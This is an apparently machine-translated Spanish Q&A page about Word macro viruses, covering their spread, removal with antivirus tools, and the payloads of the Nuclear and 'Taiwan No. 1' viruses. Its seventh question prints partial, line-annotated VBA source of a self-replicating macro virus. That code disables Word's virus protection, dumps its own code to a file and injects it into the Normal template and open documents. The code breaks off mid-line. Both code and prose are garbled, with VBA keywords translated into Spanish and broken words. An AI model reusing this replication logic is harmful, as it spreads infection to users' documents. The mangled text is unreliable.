Red de conocimiento informático - Conocimiento informático - ¿Qué significa virus de macro?

¿Qué significa virus de macro?

Pregunta 1: ¿Cuáles son los síntomas del macro virus? Un virus de macro

es un virus informático que reside en una macro de un documento o plantilla. Una vez que se abre dicho documento, las macros que contiene se ejecutarán y el virus de macro se activará, se transferirá a la computadora y residirá en la plantilla Normal. A partir de ahora, todos los documentos guardados automáticamente quedarán "infectados" con el virus de macro y, si otro usuario abre el documento infectado, el virus de macro se transferirá a su ordenador.

¿Qué es un virus de macro?

Los virus de macro son uno o más virus especialmente creados que aprovechan la apertura de Microsoft Office, es decir, la interfaz de programación VBA proporcionada en Word. por personas con motivos ocultos Macro *** de las características del virus. Sus características son que se propaga extremadamente rápido, es fácil hacer variantes y es extremadamente destructivo.

La mayoría de los virus de macro contienen macros automáticas o instrucciones de macro para operaciones de lectura y escritura de documentos, que se almacenan en archivos .doc o .dot en el formato cifrado y comprimido BFF (Binary File Format), cada versión de Word El formato puede ser incompatible.

Varios virus de macro importantes descubiertos actualmente son: Wazzu, Concept, Virus 13, Nuclear, July.killer (también conocido como "July Killer").

Los virus de macro se replican y propagan a través de documentos DOC y plantillas DOT. Después de que un archivo DOC es infectado por un virus de macro, sus atributos inevitablemente se cambiarán a una plantilla en lugar de un documento (aunque su extensión todavía tiene el formato DOC). Tan pronto como se abre dicho archivo, el virus de macro se activa, se transfiere a la computadora y reside en la plantilla Normal. A partir de ahora, todos los documentos guardados automáticamente quedarán "infectados" con este virus de macro.

Compruebe y elimine los virus de macro

Debido a que el formato BFF de cada versión de Word no es exactamente el mismo, el formato y la ubicación de almacenamiento de los virus de macro en diferentes versiones de Word son diferentes. Por lo tanto, la clave para utilizar software antivirus para eliminar virus de macro es poder restaurar de forma correcta y segura los parámetros del archivo después del antivirus.

El autor utiliza actualmente el software antivirus KV300, que tiene dos métodos de desintoxicación.

Método 1: Ejecute kvw3000.exe en el entorno Windows y seleccione cualquier subdirectorio donde puedan existir virus de macro para escanear y eliminar. Después de que KV300 detecta un virus, por motivos de seguridad, primero cambia su extensión a .kv y luego elimina el virus en el archivo original.

Método 2: En un entorno DOS, utilice un disquete limpio del sistema Windows 98 para iniciar la máquina y ejecutar KV300. Después de que aparezca el menú principal, presione la tecla de la letra de la unidad que puede contener virus de macro y la tecla. Los virus de macro se detectarán automáticamente, borrarán, restaurarán con precisión los parámetros del archivo y el archivo se podrá abrir normalmente.

Cuando encuentre un documento de Word de una fuente desconocida que indique la presencia de macros, utilice un software antivirus para comprobarlo primero y no lo abra precipitadamente. No lo olvide. >

1. El principio del virus de macro

Las características del virus de macro WORD/EXCEL son relativamente similares, por lo que solo tomamos el virus de macro WORD como ejemplo para explicar la función, infección y Mecanismo de ataque y características del macro virus.

La generación de virus de macro se forma aprovechando las características del lenguaje de programación de comandos de macro incorporado en algunos sistemas de procesamiento de datos. La existencia de lenguajes de programación de macros integrados en estos sistemas de procesamiento de datos permite que los virus de macros se aprovechen de ellos. Los virus pueden adjuntar códigos de comandos de macros específicos a archivos designados, obtener control al abrir o cerrar archivos y realizar comandos de macros. entre diferentes archivos, compartir y pasar, obteniendo así cierto control sin el permiso del usuario, para lograr el propósito de infección. Actualmente, entre los sistemas que pueden verse infectados por virus de macro, Microsoft Word y Excel son los más comunes.

2. El mecanismo de acción de los virus de macro

Tome Word como ejemplo. Una vez que una macro de virus invade WORD, reemplazará las macros normales originales, como FileOpen, FileSave, FileSaveAs y FilePrint, etc., y obtenga control sobre el intercambio de archivos a través de las funciones de operación de archivos asociadas con estas macros.

Cuando se llama a una determinada función, la macro de virus correspondiente tomará el control e implementará operaciones ilegales definidas por el virus, incluidas operaciones de infección, operaciones de ejecución, operaciones de destrucción, etc. Cuando un virus de macro infecta un documento, primero debe convertir el documento a un formato de plantilla y luego copiar todas las macros de virus (incluidas las macros automáticas) en el documento. Los archivos infectados convertidos a formato de plantilla no se pueden exportar a ningún otro formato. Enfermedades de macro que contienen macros automáticas... >>

Pregunta 2: El origen de los virus de macro El origen de los virus de macro Cuando los pioneros de los virus estaban obsesionados con su magnífica tecnología y sus logros en lenguaje ensamblador, tal vez lo haría. Nunca pensé que sus sucesores podrían utilizar métodos más simples para crear virus con mayor impacto. El virus de macro de Word es uno de los ejemplos más representativos. De hecho, la aparición de virus de macro no es inesperada. Los expertos la predijeron ya a finales de los años 80. En aquella época, algunos estudiantes escribían virus utilizando el lenguaje de macros de determinadas aplicaciones. Sin embargo, los virus de macro se diferencian de los virus comunes en que no infectan archivos .EXE o . Los macrovirus son como tornados aterradores en la naturaleza, que tienen un impacto inconmensurable en el uso normal de las computadoras para estudiar y trabajar. Al mismo tiempo, también causan un enorme desperdicio de riqueza social. El 13 de diciembre de 1996, un virus llamado "Taiwán No. 1" fue descubierto al mismo tiempo en Beijing y Shenzhen. Un caso provino de un archivo descargado de Internet y el otro de un acuerdo de cooperación en un hospital. El descubrimiento de un ataque de virus informático en una institución que se especializa en el estudio de virus médicos y protege la salud humana tiene un efecto realmente dramático. Cualquiera que haya experimentado un ataque de un virus de células pequeñas puede comprender la sensación de pánico. La raíz del pánico es que cuando no sabes nada sobre el virus en sí, sientes que tu destino está a punto de ser controlado por otros. instante. El correo electrónico de Internet se ha convertido cada vez más en un portador de virus. Cuando utiliza el correo electrónico para leer correos electrónicos en Internet, ¿alguna vez pensó que podría verse amenazado por virus informáticos? Generalmente, el contenido puro de un correo electrónico no tiene virus, pero es muy probable que los archivos adjuntos contengan virus. La propagación de virus de archivos adjuntos primero requiere ejecutarlo. Por ejemplo: recibe un archivo con un editor de Word adjunto y este archivo de Word está infectado por un virus. Cuando ejecute el archivo adjunto, su computadora se verá amenazada por el virus. La llamada macro es un grupo de comandos agrupados para completar una tarea específica como un solo comando. La definición de macro en Microsoft Word es: "Una macro es una serie de comandos de palabras que se pueden organizar juntos como un comando independiente para facilitar el trabajo diario". Word utiliza el lenguaje de macros Word_Basic para escribir macros como una serie de instrucciones. Para comprender los entresijos de los virus de macro, debe comprender el conocimiento de las macros de Word y la tecnología de programación de WordBasic. El virus de macro Wo_rd es un virus creado por algunos profesionales que crean virus aprovechando la apertura de Microsoft Word, es decir, la interfaz de programación WordBASIC proporcionada en Word, para crear especialmente una o más macros con características de virus. La macro de virus se puede utilizar en computadoras y se puede autocopiar y difundir a través de documentos .DOC y plantillas .DOT.

Pregunta 3: ¿Qué es el análisis de virus de macros 360? Para los trabajadores de oficina y los estudiantes usuarios de computadoras, lo más problemático es cuando los documentos de Office están infectados con virus de macro. En el peor de los casos, todos los documentos que se han editado después de mucho tiempo. El trabajo se eliminará y, en el peor de los casos, los documentos privados se eliminarán mediante virus. En este momento, 360 Antivirus se actualizó recientemente a la versión oficial 3.1 y lanzó el escaneo de virus de macros de Office "Special Kill", que puede detectar y eliminar de manera integral los virus de macros de Office parásitos en documentos como Excel y Word. Sus capacidades de escaneo y eliminación están en. la posición de liderazgo en la industria.

Pregunta 4: Análisis de los virus de macro Las principales formas de propagación de los virus de macro son: 1. Los disquetes intercambian archivos de documentos infectados con virus 2. Los discos duros están infectados con virus y los archivos de documentos procesados ​​definitivamente; estar infectado con virus; 3. Los CD contienen macros Virus; 4. Archivos de documentos infectados con virus descargados de Internet 5. Archivos de documentos infectados con virus comunicados en BBS; Análisis de dos virus de macro 1. Virus de macro nuclear Este es un virus de macro que daña los archivos y las impresiones del sistema operativo.

Este virus de macro contiene las siguientes macros de virus: AutoExecAutoOpenDropSurivFileExitFilePrintFilePrintDefaultFileSaveAsInsertPayloadPayload. Estas macros son macros de solo ejecución. El daño causado por el virus de macro nuclear es el siguiente: (1) Cuando abre un documento infectado con virus y lo imprime, agregará "¡DETENGA TODAS LAS PRUEBAS NUCLEARES FRANCESAS EN EL PACÍFICO!" en el último párrafo que imprima. Este fenómeno ocurre entre 55 y 60 segundos por semana. minuto. Ocurre durante la impresión. (2) Si abre un documento infectado con virus entre las 17:00 y las 18:00 todos los días, el virus Nuclear infectará el virus PH33R en la computadora. Este es un virus residente. (3) El 5 de abril de cada año, el virus borrará los archivos IO.SYS y MSDOS.SYS de la computadora y eliminará el archivo MAND del directorio raíz de la unidad C. Una vez que el virus ataca, MSDOS no se puede iniciar y la computadora quedará paralizada. 2. Virus Taiwán No. 1 El virus Taiwán No. 1 afectará su uso normal de documentos y editores de Word el día 13 de cada mes. Contiene las siguientes macros de virus: AutoCloseAutoNewAutoOpen Estas macros son macros editables. La macro de virus contiene la siguiente declaración: IfDay(Now())=13Then... Esta declaración está relacionada con el día 13. El daño causado por el virus número uno de Taiwán es que el día 13 de cada mes, si un usuario usa Word para abrir un documento (plantilla) que contiene un virus, el virus se activará. El fenómeno cuando se activa es: aparece un cuadro de diálogo en el centro de la pantalla, que solicita al usuario que resuelva un problema de aritmética mental. Si comete un error, abrirá el archivo indefinidamente hasta que Word no tenga suficiente memoria y Word haga una. error; como un problema de aritmética mental, si se hace correctamente, se le preguntará al usuario "¿Qué es un virus de macro (virus de macro)?", y se le preguntará "Soy un virus de macro", y luego al usuario. Se le preguntará: "¿Cómo prevenir los virus de macro?" y la respuesta será "No me mires".

Pregunta 5: ¿Cuál es la diferencia entre la detección y eliminación de virus de macro 360 y los virus troyanos? La detección y eliminación de virus de macro 360 es una detección y eliminación de virus de macro profesional. Es un tipo de virus de macro que se almacena en. la macro de un documento o plantilla. Virus informático. Es diferente del caballo de Troya.

Pregunta 6: ¿Cuál es la diferencia entre los virus de macro y los virus de gusano? Los virus de macro solo funcionan en la oficina ~ mientras que los virus de gusano están más extendidos ~ como el conocido "Panda Burning Incense" es un gusano

Pregunta 7: Me gustaría pedirle a un experto que proporcione un análisis detallado del código del virus de macro y lo que significa cada oración. Private Sub Document_Close() 'evento de cierre, que se activa cuando se cierra el documento

En caso de error Reanudar siguiente 'Si ocurre un error, ejecuta la siguiente oración

s = ActiveDocument.Saved, guardar el documento activo actual Guarde y guarde el resultado en la variable s

Application.EnableCancelKey = Not -1 'Hacer que el programa se ejecute de forma ininterrumpida

Con opciones: .ConfirmConversions = 0: .VirusProtection = 0: . SaveNormatingPrompt = 0: Terminar con Escriba varias oraciones en las siguientes líneas y establezca algunos atributos de opciones. Es demasiado problemático. Si no entiendes una o dos frases, te lo diré.

Aleatorizar

Si Dir(c:\ethan.___, 6) = Entonces

Abrir c:\ethan.___ para obtener salida como #1

p>

Para i = 1 A MacroContainer.VBProject.VBponents.Item(1).CodeModule.CountOfLines

a = MacroContainer.VBProject.VBponents.Item(1).CodeModule .Lines(i, 1)

Imprimir #1, a

Siguiente I

Cerrar #1

SetAttr c:\ethan .___, 6

Finalizar si

Si Dir(c:\class.sys) Luego eliminar c:\class.sys

Si NormalTemplate.VBProject. VBponents.Item( 1 ) .CodeModule.Lines (1, 1) Sub privado

Document_Close() Luego

Establecer t = NormalTemplate.VBProject.VBponents.Item (1)

De lo contrario, si ActiveDocument.VBProject.VBponents.Item(1) .CodeModule.Lines(1, 1) Private SubDocument_Close() Entonces

Establezca t = ActiveDocument.VBProject.VBponents.Item(1 )

Else

t =

Finalizar si

Si t Entonces

Abrir c:\ethan. ___ Para entrada como # 1

Si LOF(1) = 0 Entonces Ir a q

i = 1

Hacer mientras no sea EOF(1)

Entrada de línea n.° 1, a

Entrada de línea n.° 1, a

t.CodeModule.InsertLines i, a

i = i + 1

Bucle

q:

Cerrar #1

Si Rnd